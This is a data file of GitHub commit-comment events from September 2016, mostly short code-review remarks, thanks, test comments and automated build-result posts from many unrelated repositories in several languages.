{"id":"4606242571","type":"CommitCommentEvent","actor":{"login":"weng-pang"},"repo":{"name":"jewelyang10/UltimateInhaler"},"payload":{"comment":{"id":19140089,"position":5,"line":8,"path":"build.gradle","commit_id":"943273cdb87ad3b17cf532e2213ded1c6d3160c4","created_at":"2016-09-23T02:30:12Z","updated_at":"2016-09-23T02:30:12Z","body":"This is not allowed, the other team members cannot run under this configuration."}},"created_at":"2016-09-23T02:30:12Z"}
{"id":"4606244642","type":"CommitCommentEvent","actor":{"login":"root-beer"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":19140091,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-23T02:30:52Z","updated_at":"2016-09-23T02:30:52Z","body":"ありがとう！😃 "}},"created_at":"2016-09-23T02:30:52Z"}
{"id":"4606245179","type":"CommitCommentEvent","actor":{"login":"Samanthann464"},"repo":{"name":"dsdshcym/DeviceCheckSystem"},"payload":{"comment":{"id":19140092,"position":null,"line":null,"path":null,"commit_id":"9d936b2f4de73424822a9e96532bd4f0d8495299","created_at":"2016-09-23T02:31:05Z","updated_at":"2016-09-23T02:31:05Z","body":"V"}},"created_at":"2016-09-23T02:31:05Z"}
{"id":"4606246074","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":19140093,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-23T02:31:29Z","updated_at":"2016-09-23T02:31:29Z","body":"どいたしまして。"}},"created_at":"2016-09-23T02:31:29Z"}
{"id":"4606246511","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140095,"position":216,"line":1130,"path":"index.html","commit_id":"6da32052cbb30debddba62ae9456f8ad17017a6e","created_at":"2016-09-23T02:31:39Z","updated_at":"2016-09-23T02:31:39Z","body":"Think there was too much copy/paste going on :wink: "}},"created_at":"2016-09-23T02:31:39Z"}
{"id":"4606250460","type":"CommitCommentEvent","actor":{"login":"crista"},"repo":{"name":"Mondego/SourcererCC"},"payload":{"comment":{"id":19140099,"position":16,"line":21,"path":"src/models/ThreadedChannel.java","commit_id":"0a211633574234f820ea3e822b88549e2acac908","created_at":"2016-09-23T02:33:15Z","updated_at":"2016-09-23T02:33:15Z","body":"It means that there can be two additional tasks put in waiting by senders until the next sender blocks"}},"created_at":"2016-09-23T02:33:15Z"}
{"id":"4606253172","type":"CommitCommentEvent","actor":{"login":"PennyQ"},"repo":{"name":"maxwelltsai/SiMon"},"payload":{"comment":{"id":19140105,"position":33,"line":57,"path":"run_manager2.py","commit_id":"307a77e1efbcbbbd78977716ec0a8c65dbc80e18","created_at":"2016-09-23T02:34:21Z","updated_at":"2016-09-23T02:34:21Z","body":"@maxwelltsai So in principal this `__repr__` is for print out current `SimulationInstance` instance and all its children info to terminal, the long comment here confused me at first sight ;)"}},"created_at":"2016-09-23T02:34:21Z"}
{"id":"4606256931","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"facebook/WebDriverAgent"},"payload":{"comment":{"id":19140112,"position":null,"line":null,"path":null,"commit_id":"32d50f9e4463f62088e759d323a6a6d11ad56c44","created_at":"2016-09-23T02:35:41Z","updated_at":"2016-09-23T02:35:41Z","body":"Nice, thank you very much."}},"created_at":"2016-09-23T02:35:41Z"}
{"id":"4606257356","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140115,"position":229,"line":1138,"path":"index.html","commit_id":"6da32052cbb30debddba62ae9456f8ad17017a6e","created_at":"2016-09-23T02:35:52Z","updated_at":"2016-09-23T02:35:52Z","body":"And here"}},"created_at":"2016-09-23T02:35:52Z"}
{"id":"4606257475","type":"CommitCommentEvent","actor":{"login":"wgma00"},"repo":{"name":"dem1995/wgma00.github.io"},"payload":{"comment":{"id":19140116,"position":9,"line":7,"path":"_posts/2015-10-27-pokemon-rant.md","commit_id":"270142f5c668378d0ee5f8ccb371afbec4ab51bb","created_at":"2016-09-23T02:35:56Z","updated_at":"2016-09-23T02:35:56Z","body":"\"to status your opponent's Pokémon\" should be \"to status their opponent's Pokémon\"\r\n\"This is likely because are no\" should be \" This is likely because there are no\"\r\n"}},"created_at":"2016-09-23T02:35:56Z"}
{"id":"4606258568","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140121,"position":242,"line":1146,"path":"index.html","commit_id":"6da32052cbb30debddba62ae9456f8ad17017a6e","created_at":"2016-09-23T02:36:22Z","updated_at":"2016-09-23T02:36:22Z","body":":point_right: "}},"created_at":"2016-09-23T02:36:22Z"}
{"id":"4606259160","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140122,"position":255,"line":1154,"path":"index.html","commit_id":"6da32052cbb30debddba62ae9456f8ad17017a6e","created_at":"2016-09-23T02:36:35Z","updated_at":"2016-09-23T02:36:35Z","body":":point_up: "}},"created_at":"2016-09-23T02:36:35Z"}
{"id":"4606259778","type":"CommitCommentEvent","actor":{"login":"MagicDroidX"},"repo":{"name":"Nukkit/Nukkit"},"payload":{"comment":{"id":19140123,"position":null,"line":null,"path":null,"commit_id":"f00189bc804e02f0cb25eae3224598245136d3a1","created_at":"2016-09-23T02:36:50Z","updated_at":"2016-09-23T02:36:50Z","body":"Does this work for the import of `Variable Integer`?"}},"created_at":"2016-09-23T02:36:50Z"}
{"id":"4606262128","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/MOHA-Kafka"},"payload":{"comment":{"id":19140130,"position":null,"line":null,"path":null,"commit_id":"c05e529e66c0556e943307a35203ab5970d8971f","created_at":"2016-09-23T02:37:47Z","updated_at":"2016-09-23T02:37:47Z","body":"This is a testing to show how the GitHub comments can work"}},"created_at":"2016-09-23T02:37:47Z"}
{"id":"4606264409","type":"CommitCommentEvent","actor":{"login":"lingostar"},"repo":{"name":"GeekInTheClass/WorldWideBeer"},"payload":{"comment":{"id":19140138,"position":null,"line":null,"path":null,"commit_id":"cd10e340aa821e988cd66be6e0b7216da0da27a8","created_at":"2016-09-23T02:38:44Z","updated_at":"2016-09-23T02:38:44Z","body":"#2 이슈 해결 커밋"}},"created_at":"2016-09-23T02:38:44Z"}
{"id":"4606264824","type":"CommitCommentEvent","actor":{"login":"WooLimKim"},"repo":{"name":"GeekInTheClass/Coffee2"},"payload":{"comment":{"id":19140141,"position":null,"line":null,"path":null,"commit_id":"20328384af987a48dc22aa7ebea77c8e41b762e0","created_at":"2016-09-23T02:38:55Z","updated_at":"2016-09-23T02:38:55Z","body":"#2 commit "}},"created_at":"2016-09-23T02:38:55Z"}
{"id":"4606265853","type":"CommitCommentEvent","actor":{"login":"ps2"},"repo":{"name":"ps2/rileylink_ios"},"payload":{"comment":{"id":19140146,"position":null,"line":null,"path":null,"commit_id":"f19575aa4bf9c3a4b471dfce3a595a6f804a87c8","created_at":"2016-09-23T02:39:20Z","updated_at":"2016-09-23T02:39:20Z","body":"bah. got the dev team changes."}},"created_at":"2016-09-23T02:39:20Z"}
{"id":"4606270337","type":"CommitCommentEvent","actor":{"login":"zhenhappy"},"repo":{"name":"gavinkwoe/weapp-ide-crack"},"payload":{"comment":{"id":19140157,"position":5,"line":6,"path":"README.md","commit_id":"f62c0570ce69256b56624ee332c0d4c070e3801c","created_at":"2016-09-23T02:41:02Z","updated_at":"2016-09-23T02:41:02Z","body":"0.7的百度云盘地址怎么和0.9的一样"}},"created_at":"2016-09-23T02:41:02Z"}
{"id":"4606270653","type":"CommitCommentEvent","actor":{"login":"wgma00"},"repo":{"name":"dem1995/wgma00.github.io"},"payload":{"comment":{"id":19140158,"position":31,"line":23,"path":"_posts/2015-10-27-pokemon-rant.md","commit_id":"270142f5c668378d0ee5f8ccb371afbec4ab51bb","created_at":"2016-09-23T02:41:10Z","updated_at":"2016-09-23T02:41:10Z","body":"\"This change gave rise to Dark type Pokémon like Bisharp being commonly used, as they could take great advantage with their high base attack\"\r\nreads better as\r\n\"This change gave rise to Dark type Pokémon like Bisharp, as they could take advantage of this buff with their high base attack.\""}},"created_at":"2016-09-23T02:41:10Z"}
{"id":"4606278604","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140173,"position":37,"line":77,"path":"view.php","commit_id":"eaa6e4ddb885ae1517a076c7114c6c6f7996caba","created_at":"2016-09-23T02:44:23Z","updated_at":"2016-09-23T02:44:23Z","body":"<?php if ($tweet['member_id'] == $_SESSION['id']): ?>\r\n  [<a href=\"delete.php?tweet_id=<?php echo $tweet['member_id']; ?>\" style=\"color: #F33;\">削除</a>]\r\n<?php endif; ?>\r\n"}},"created_at":"2016-09-23T02:44:23Z"}
{"id":"4606280423","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140175,"position":37,"line":77,"path":"view.php","commit_id":"eaa6e4ddb885ae1517a076c7114c6c6f7996caba","created_at":"2016-09-23T02:45:04Z","updated_at":"2016-09-23T02:45:04Z","body":"サニタイズも入れる！"}},"created_at":"2016-09-23T02:45:04Z"}
{"id":"4606281458","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/test-repo"},"payload":{"comment":{"id":19140177,"position":null,"line":null,"path":null,"commit_id":"6a485632f1f3869a218b6afbf7b0367d982bdc38","created_at":"2016-09-23T02:45:29Z","updated_at":"2016-09-23T02:45:29Z","body":"I am testing this comment to see the notification service is working."}},"created_at":"2016-09-23T02:45:29Z"}
{"id":"4606281820","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCoreLegacy/TrinityCore"},"payload":{"comment":{"id":19140180,"position":null,"line":null,"path":null,"commit_id":"32b780bffd31796b9f4a9e0a1fb9a200ef4701a6","created_at":"2016-09-23T02:45:36Z","updated_at":"2016-09-23T02:45:36Z","body":"Why enable all those unused opcodes? They are not sended to client anywhere."}},"created_at":"2016-09-23T02:45:36Z"}
{"id":"4606281824","type":"CommitCommentEvent","actor":{"login":"sirkay777"},"repo":{"name":"caster8013/doubanBooklist"},"payload":{"comment":{"id":19140181,"position":null,"line":null,"path":null,"commit_id":"0e0a92aa2eb18c0eda5a489fe2c48e7e1aa6c83b","created_at":"2016-09-23T02:45:37Z","updated_at":"2016-09-23T02:45:37Z","body":"I have read and run your code. Well done 👍  Please continue to work on Redux."}},"created_at":"2016-09-23T02:45:37Z"}
{"id":"4606288756","type":"CommitCommentEvent","actor":{"login":"aekei"},"repo":{"name":"aekei/Linux"},"payload":{"comment":{"id":19140190,"position":null,"line":null,"path":null,"commit_id":"0a28a5b72cf7374c7830e61bfc8fd81f062607db","created_at":"2016-09-23T02:48:08Z","updated_at":"2016-09-23T02:48:08Z","body":"thx"}},"created_at":"2016-09-23T02:48:08Z"}
{"id":"4606291160","type":"CommitCommentEvent","actor":{"login":"jeveloper"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19140194,"position":null,"line":null,"path":null,"commit_id":"7a5083cbb820faec0bb684c010e15c222ce7e533","created_at":"2016-09-23T02:49:05Z","updated_at":"2016-09-23T02:49:05Z","body":"Love it !!\r\n\r\ncan't wait to try"}},"created_at":"2016-09-23T02:49:05Z"}
{"id":"4606291410","type":"CommitCommentEvent","actor":{"login":"hschafer"},"repo":{"name":"socrata/cetera"},"payload":{"comment":{"id":19140195,"position":null,"line":null,"path":null,"commit_id":"e2851bafecc126cf2c8011f53a62911cf8cb22e3","created_at":"2016-09-23T02:49:11Z","updated_at":"2016-09-23T02:49:11Z","body":"Aaaah stupid typos. It looks like there is an extra e in preview still though. "}},"created_at":"2016-09-23T02:49:11Z"}
{"id":"4606292324","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19140199,"position":32,"line":83,"path":"vis/analyzers/indexers/active_voices.py","commit_id":"66e744747312a1e40df4ad5292b8992c4d03073f","created_at":"2016-09-23T02:49:33Z","updated_at":"2016-09-23T02:49:33Z","body":"The documentation is here, but it is not being picked up by sphinx. It is also not clear from the documentation in here what the goal of the object is."}},"created_at":"2016-09-23T02:49:33Z"}
{"id":"4606294273","type":"CommitCommentEvent","actor":{"login":"colbertnut"},"repo":{"name":"F1nalFortune/cooledge"},"payload":{"comment":{"id":19140207,"position":null,"line":null,"path":null,"commit_id":"f9b5380f67627d7ff17a2df3a6c63d4fb06cd959","created_at":"2016-09-23T02:50:16Z","updated_at":"2016-09-23T02:50:16Z","body":"Changed SignUp.js to Register.js\r\n"}},"created_at":"2016-09-23T02:50:16Z"}
{"id":"4606294994","type":"CommitCommentEvent","actor":{"login":"scriptain"},"repo":{"name":"scriptain/scriptain.github.io"},"payload":{"comment":{"id":19140208,"position":2,"line":2,"path":"LICENSE","commit_id":"f54ab40846ff5a39a8ce3a95e824080e24e59ab4","created_at":"2016-09-23T02:50:35Z","updated_at":"2016-09-23T02:50:35Z","body":"no one in their right mind would use any of this ever for anything. the project is just for me to test using git. "}},"created_at":"2016-09-23T02:50:35Z"}
{"id":"4606302306","type":"CommitCommentEvent","actor":{"login":"caster8013"},"repo":{"name":"caster8013/doubanBooklist"},"payload":{"comment":{"id":19140213,"position":null,"line":null,"path":null,"commit_id":"0e0a92aa2eb18c0eda5a489fe2c48e7e1aa6c83b","created_at":"2016-09-23T02:53:31Z","updated_at":"2016-09-23T02:53:31Z","body":"Thanks.I'm working on it now.\r\nps. I can't walk this far without your help and support.@sirkay777 "}},"created_at":"2016-09-23T02:53:31Z"}
{"id":"4606303960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140215,"position":null,"line":null,"path":null,"commit_id":"feee1db581a852e034f50474f310c6e458303e09","created_at":"2016-09-23T02:54:10Z","updated_at":"2016-09-23T02:54:10Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1198 of 1198 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feee1db581a852e034f50474f310c6e458303e09-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T02:54:10Z"}
{"id":"4606307862","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140222,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-23T02:55:38Z","updated_at":"2016-09-23T02:55:38Z","body":"MoreDayliteFollowup (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2334 of 2342 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T02:55:38Z"}
{"id":"4606308454","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140225,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T02:55:51Z","updated_at":"2016-09-23T02:55:51Z","body":"iteration (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2364 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T02:55:51Z"}
{"id":"4606309953","type":"CommitCommentEvent","actor":{"login":"Jeoker"},"repo":{"name":"libusb/libusb"},"payload":{"comment":{"id":19140230,"position":181,"line":181,"path":"examples/testlibusb.c","commit_id":"bcac08d60facba5f92d0ccfe548dea2da86f9113","created_at":"2016-09-23T02:56:28Z","updated_at":"2016-09-23T02:56:28Z","body":"I wonder if theres any problem with this sentence. :) when i try to compile this cpp with linker:\"gcc -o testlibusb testlibusb.cpp -ludev\", it always throw an err says:\"invalid conversion from 'char*' to 'unsigned char*'[-fpremissive].\" I checked my libaray and linker, i guess i didn't make any mistake? "}},"created_at":"2016-09-23T02:56:28Z"}
{"id":"4606310027","type":"CommitCommentEvent","actor":{"login":"pramirez1977"},"repo":{"name":"pramirez1977/test-repo"},"payload":{"comment":{"id":19140231,"position":null,"line":null,"path":null,"commit_id":"61b3ce3aad399e9055ceb0995b8affc96c4fb075","created_at":"2016-09-23T02:56:31Z","updated_at":"2016-09-23T02:56:31Z","body":"terminar"}},"created_at":"2016-09-23T02:56:31Z"}
{"id":"4606310531","type":"CommitCommentEvent","actor":{"login":"Andreeyyy"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19140233,"position":null,"line":null,"path":null,"commit_id":"c270d431040f8fa9e9ae20821fc75b59264a3c25","created_at":"2016-09-23T02:56:41Z","updated_at":"2016-09-23T02:56:41Z","body":"Como assim?! Colocou pra dropar os itens que vão pra reward chest?!?!?!"}},"created_at":"2016-09-23T02:56:41Z"}
{"id":"4606313026","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19140236,"position":6,"line":395,"path":"mandelbulber2/src/compute_fractal.cpp","commit_id":"7e7efe670986153ec90987586317153c392afe03","created_at":"2016-09-23T02:57:41Z","updated_at":"2016-09-23T02:57:41Z","body":"thank you, i am now getting arrows !!!! :)\n\nOn Fri, Sep 23, 2016 at 4:34 AM, Sebastian Jennen <notifications@github.com>\nwrote:\n\n> @mclarekin <https://github.com/mclarekin>\n> hey graeme,\n>\n> I think you have your indentation wrong in your IDE.\n> Make sure you are using tabs, in qtcreator here:\n> Tools > Options > C++ > Edit Settings > Tab Policy ----> Select tabs only\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/buddhi1980/mandelbulber2/commit/7e7efe670986153ec90987586317153c392afe03#commitcomment-19133094>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLZHO671rrJKKQd7J1u6H8GvhelDVzoks5qsq39gaJpZM4KEGqh>\n> .\n>\n"}},"created_at":"2016-09-23T02:57:41Z"}
{"id":"4606315911","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19140239,"position":25,"line":88,"path":"index.php","commit_id":"9a44b5d2de0ebdbd48fe006e99d27a3e84a6a44d","created_at":"2016-09-23T02:58:51Z","updated_at":"2016-09-23T02:58:51Z","body":"１番目"}},"created_at":"2016-09-23T02:58:51Z"}
{"id":"4606318055","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19140248,"position":37,"line":98,"path":"vis/analyzers/indexers/active_voices.py","commit_id":"66e744747312a1e40df4ad5292b8992c4d03073f","created_at":"2016-09-23T02:59:42Z","updated_at":"2016-09-23T02:59:42Z","body":"All code examples in the documentation need to look as follows:\r\n```\r\n>>> import music21\r\n>>> from vis.analyzers.indexers import noterest, active_voices\r\n>>> score = music21.converter.parse('example.xml')\r\n>>> notes = noterest.NoteRestIndexer(score).run()\r\n>>> av = active_voices.ActiveVoicesIndexer(notes).run()\r\n>>> print(av)\r\n```\r\n\r\nIn addition, rather than calling it ```example.xml``` perhaps a file from the ```vis/tests/corpus/``` directory should be referenced here."}},"created_at":"2016-09-23T02:59:42Z"}
{"id":"4610604138","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19152052,"position":21,"line":21,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-23T20:00:24Z","updated_at":"2016-09-23T20:00:24Z","body":"Ten kod zostanie wykonany nawet jeśli zajdą `Nieprawidłowe dane`\r\n\r\nPowinnaś go dodać w `else`\r\nlub w ifach u góry dawać jakiś return, aby przerwać funkcję."}},"created_at":"2016-09-23T20:00:24Z"}
{"id":"4610604999","type":"CommitCommentEvent","actor":{"login":"enoch85"},"repo":{"name":"felixheidecke/core"},"payload":{"comment":{"id":19152054,"position":null,"line":null,"path":null,"commit_id":"e4c21eef7bcb24a83ff8fb6fbcb99d9c54b50711","created_at":"2016-09-23T20:00:36Z","updated_at":"2016-09-23T20:00:36Z","body":"Do as you please :)"}},"created_at":"2016-09-23T20:00:36Z"}
{"id":"4610606889","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19152058,"position":15,"line":15,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-23T20:01:00Z","updated_at":"2016-09-23T20:01:00Z","body":"Rób wcięcia w kodzie."}},"created_at":"2016-09-23T20:01:00Z"}
{"id":"4610607122","type":"CommitCommentEvent","actor":{"login":"usarica"},"repo":{"name":"JHUGen/JHUGen"},"payload":{"comment":{"id":19152059,"position":null,"line":null,"path":null,"commit_id":"92a22bf283a414e54804358d5c5298a08ba01e31","created_at":"2016-09-23T20:01:03Z","updated_at":"2016-09-23T20:01:03Z","body":"Thank you"}},"created_at":"2016-09-23T20:01:03Z"}
{"id":"4610609968","type":"CommitCommentEvent","actor":{"login":"stegu"},"repo":{"name":"patriciogonzalezvivo/thebookofshaders"},"payload":{"comment":{"id":19152068,"position":null,"line":null,"path":null,"commit_id":"6ccd3066437f340d8ecd01e1a0687349b78c049e","created_at":"2016-09-23T20:01:41Z","updated_at":"2016-09-23T20:01:41Z","body":"Edited language and spelling, made some clarifications"}},"created_at":"2016-09-23T20:01:41Z"}
{"id":"4610611117","type":"CommitCommentEvent","actor":{"login":"im85288"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19152074,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T20:01:56Z","updated_at":"2016-09-23T20:01:56Z","body":"It was not something I meant to include as the time for parsing channel broadcast data takes too long. Anyway it's removed with this commit: https://github.com/im85288/script.tvguide.dvr/commit/02acbea757e906a77e9b4c5568fcdf168749ad80\r\nWe all look around at each others code for inspiration and indeed if I was using it in the addon I would give you a shout out when I posted about it, but if you check my thread I haven't announced support for it. In the end I teamed up with primaeval for a different approach of just getting the channels from the pvr and adding that to the addon.ini. Take a look at gui.py if it helps.  \r\n\r\nWe are not having a tvguide war I hope!\r\n\r\nCheers\r\n"}},"created_at":"2016-09-23T20:01:56Z"}
{"id":"4610611198","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19152075,"position":29,"line":29,"path":"js/scripts.js","commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-23T20:01:57Z","updated_at":"2016-09-23T20:01:57Z","body":"Jest ok, ale w zamian możesz tutaj również wpisać `Triangle1Area`. Bo ta zmienna posiada wynik działania funkcji."}},"created_at":"2016-09-23T20:01:57Z"}
{"id":"4610614118","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.6-"},"payload":{"comment":{"id":19152084,"position":null,"line":null,"path":null,"commit_id":"681a51bed88394f9849972dc3b4240abae9719e1","created_at":"2016-09-23T20:02:34Z","updated_at":"2016-09-23T20:02:34Z","body":"Zrób tak, aby kod zwrócił zawsze 0 jeśli zajdą `Nieprawidłowe dane` i popraw wcięcia."}},"created_at":"2016-09-23T20:02:34Z"}
{"id":"4610619673","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19152100,"position":null,"line":null,"path":null,"commit_id":"f7fd3697c51c65df99e1d25f1c407dc5786d33c8","created_at":"2016-09-23T20:03:48Z","updated_at":"2016-09-23T20:03:48Z","body":"I don't understand the condition \r\n\r\n````\r\n   (theirPawns && s + Up + Up && more_than_one(lever))\r\n````\r\n\r\nDid you mean to use & instead of && at the beginning ?\r\n\r\n````\r\n       (theirPawns & (s + Up + Up))\r\n  && more_than_one(lever)\r\n````\r\n\r\nBut then, what happens is s on the 7th rank ?\r\n\r\n\r\n"}},"created_at":"2016-09-23T20:03:48Z"}
{"id":"4610623854","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"charliewu886/charliewu886-gmail.com"},"payload":{"comment":{"id":19152112,"position":null,"line":null,"path":null,"commit_id":"59fa576ae329fa934e0f7b6fbfc2fe026ab18b8d","created_at":"2016-09-23T20:04:45Z","updated_at":"2016-09-23T20:04:45Z","body":"59fa576"}},"created_at":"2016-09-23T20:04:45Z"}
{"id":"4610623981","type":"CommitCommentEvent","actor":{"login":"liks79"},"repo":{"name":"liks79/flask"},"payload":{"comment":{"id":19152113,"position":null,"line":null,"path":null,"commit_id":"3954969ab70243abb544d3cbb284b5084fa15a76","created_at":"2016-09-23T20:04:47Z","updated_at":"2016-09-23T20:04:47Z","body":"감사합니다 ^^"}},"created_at":"2016-09-23T20:04:47Z"}
{"id":"4610624262","type":"CommitCommentEvent","actor":{"login":"tcz001"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19152116,"position":20,"line":239,"path":"otrv4.md","commit_id":"d188bf58842e839a856f9427f32c6fbbd7748648","created_at":"2016-09-23T20:04:51Z","updated_at":"2016-09-23T20:04:51Z","body":"We are actually still considering this, I haven't see enough reason to contain the PNs."}},"created_at":"2016-09-23T20:04:51Z"}
{"id":"4610627780","type":"CommitCommentEvent","actor":{"login":"charliewu886"},"repo":{"name":"charliewu886/charliewu886-gmail.com"},"payload":{"comment":{"id":19152127,"position":5,"line":5,"path":".gitignore","commit_id":"59fa576ae329fa934e0f7b6fbfc2fe026ab18b8d","created_at":"2016-09-23T20:05:37Z","updated_at":"2016-09-23T20:05:37Z","body":"#Liveme (null)"}},"created_at":"2016-09-23T20:05:37Z"}
{"id":"4610628009","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19152128,"position":18,"line":18,"path":"js/scripts.js","commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-23T20:05:40Z","updated_at":"2016-09-23T20:05:40Z","body":"dodatkowe sprawdzanie warunku jest niekonieczne, bo funkcja ta może mieć dwa stany.\r\n-1 - jeśli nic nie znajdzie\r\njakaś dodatnia wartość - kiedy znajdzie dany ciąg znaków, to zwróci jego indeks\r\n\r\nsam `else` wystarczy w tym przypadku."}},"created_at":"2016-09-23T20:05:40Z"}
{"id":"4610633385","type":"CommitCommentEvent","actor":{"login":"Devwarlt"},"repo":{"name":"Devwarlt/webclient"},"payload":{"comment":{"id":19152138,"position":null,"line":null,"path":null,"commit_id":"69c972c8ecdb67e9d0f9218d5ac972e37b594fde","created_at":"2016-09-23T20:06:31Z","updated_at":"2016-09-23T20:06:31Z","body":"Patch: Version **4.29.397** instead of **4.28.397**."}},"created_at":"2016-09-23T20:06:31Z"}
{"id":"4610642018","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19152163,"position":12,"line":12,"path":"js/scripts.js","commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-23T20:08:22Z","updated_at":"2016-09-23T20:08:22Z","body":"Zauważyłaś, że push modyfikuje tablicę, którą już mamy, a `x` ma nową wielkość tablicy ? :)"}},"created_at":"2016-09-23T20:08:22Z"}
